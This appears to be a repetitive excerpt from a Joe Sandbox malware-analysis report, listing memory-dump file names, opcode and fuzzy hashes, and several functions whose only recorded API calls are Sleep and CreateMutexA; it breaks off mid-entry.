Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 77fb2cb4618b5b1a3d7c45535366899e4449e5425c0362d4028d0fcbe0094ee7
Instruction ID: a3f6fda65669c432cc8e5cc938be16c47b282a080f54db62fdc6069c0b7feb22
Opcode Fuzzy Hash: 77fb2cb4618b5b1a3d7c45535366899e4449e5425c0362d4028d0fcbe0094ee7
Instruction Fuzzy Hash: 65315731B002849BEB18DB79DDC9B6DB772EFC5324F208219E014DB3D5D77AA9809B12

Function 00FEA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00FEA963
CreateMutexA.KERNEL32(00000000,00000000,01043254), ref: 00FEA981

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5fd535ebc0760c2be3619ab0c260a37842e6ab6626c777a088488ab37d6d304c
Instruction ID: 35a53af009b34dfddc5c0bc748e256ba9a207626497c2b39f137d0dbbd336009
Opcode Fuzzy Hash: 5fd535ebc0760c2be3619ab0c260a37842e6ab6626c777a088488ab37d6d304c
Instruction Fuzzy Hash: 99315931A001819BEB18DB79DDC9B6DB772EFC6310F208228E014EB3D5D77AA9809712

Function 00FEA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00FEA963
CreateMutexA.KERNEL32(00000000,00000000,01043254), ref: 00FEA981

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: b934210297f799d6ccc3c6a240b6fe001482d8c2299d4030cb81a87670f2479d
Instruction ID: a992d4a778988019b5686ec8941e098654cc07a4528b806a2e4e6091c8dbaac2
Opcode Fuzzy Hash: b934210297f799d6ccc3c6a240b6fe001482d8c2299d4030cb81a87670f2479d
Instruction Fuzzy Hash: 4A316A31A001849BEB18EB7DDDC8B6DB762EFC5314F204218E054DB3E5D7BA69809752

Function 00FEA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00FEA963
CreateMutexA.KERNEL32(00000000,00000000,01043254), ref: 00FEA981

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 50f2513c0c8cd28ab9957d6041ce5c1385a22b9af339ea3e80a384c2d8664646
Instruction ID: 33ff7a38282d7f3b7cb50d2f3e1816e16d6ce907d9f96d3bc78fc0be7181a290
Opcode Fuzzy Hash: 50f2513c0c8cd28ab9957d6041ce5c1385a22b9af339ea3e80a384c2d8664646
Instruction Fuzzy Hash: 59317931A002848BEB08DB79DDC9B6CB762EFC5324F248218E054DB3D6C779A980A712

Function 00FEA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00FEA963
CreateMutexA.KERNEL32(00000000,00000000,01043254), ref: 00FEA981

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9a92b478f1678fdeb1714174e305b770e4899baa65f9facff67641a59e2a0ef9
Instruction ID: d88ca68de3acc5b4bef106276e32a86d5fbda1cd4d963aaff7e68799f085e09e
Opcode Fuzzy Hash: 9a92b478f1678fdeb1714174e305b770e4899baa65f9facff67641a59e2a0ef9
Instruction Fuzzy Hash: 42318B31A001849BEB18DB79DDC9B6DB772EFC6320F248218E014DB3D6D779A980D712

Function 00FE9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
